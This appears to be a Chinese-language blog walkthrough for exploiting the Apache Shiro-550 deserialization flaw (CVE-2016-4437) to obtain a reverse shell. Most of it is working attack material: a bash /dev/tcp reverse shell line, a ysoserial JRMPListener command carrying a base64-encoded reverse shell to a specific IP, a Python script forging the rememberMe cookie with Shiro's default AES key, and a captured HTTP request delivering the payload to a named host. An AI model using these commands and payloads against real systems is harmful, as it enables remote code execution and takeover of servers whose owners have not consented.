Apache Shiro™(读作“sheeroh”,即日语“城”)是一个开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

Shiro使用了AES-128-CBC模式对cookie进行加密,导致恶意用户可以通过Padding Oracle攻击方式构造序列化数据进行反序列化攻击,例如SHIRO-550。(Shiro-721)

下面复现的是Shiro-550(cve_2016_4437)反弹shell的方法:

钩记住我然后抓包

把rememberMe=添加在cookie后面,记得加  ; 隔开

反弹shell

在公网上利用ysoserial.jar得JRMP模块监听1099端口,这个端口是随便输入得

利用这个链接编码payload

http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/vps的ip/vps监听反弹的端口 0>&1

如果不成功可以尝试更换CommonsCollections后面的数字

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTQuMjIzLjEzNy44Ny8xOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

在开一个窗口

生成利用poc

这个IP是vps IP,   端口是JRMP刚才监听得端口

 python shiro.py x.x.x.x:1099
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print(payload)

然后在监听设置得反弹shell 端口

然后复制到burp,发包

POST /login.jsp HTTP/1.1
Host: 188.40.189.135:17938
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: http://188.40.189.135:17938
Connection: close
Referer: http://188.40.189.135:17938/login.jsp
Cookie: JSESSIONID=4422C6AF4480FF4B5C040C030B9CFABD;rememberMe=DrxbpWvQSOuKUeVud7jHq/QhKM+XNNpp5FL2tMjLiWP4oHAlM9IzuUAxPF62xCHiKyR4qzjpPTvOteDZAEpKm/ZgV8dbfiVzZXS8+GErqTin3BNwKj1kWSn8iXUJaN9IScgMooj9N79in14q+Y/5WVVzLDol/tsZvJzUwzbaWa8naNW033BJo0VSkpVy+aiRjI6kvXsTUFP0SUYDrrOuoz1MT+htwDP/LR9jMQZXPsT1BKgDwcXPwBExWjLqjg+P4v8CbpCNE48zjqrG+lo6Yw9zaT1oWhPUDP/lJgH9+WvYuEW+g1Le+0FDBhNgI11rPiDim1RvHTzFz6etxaYMlKghirNmPbGClBJWeaD9jA681yDz8Jy9AgbnqCZ3cmLdd0Gxg2zbToLVAalVvriPow==
Upgrade-Insecure-Requests: 1

username=admin&password=admin123&rememberMe=on&submit=Login

大概就这些……

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...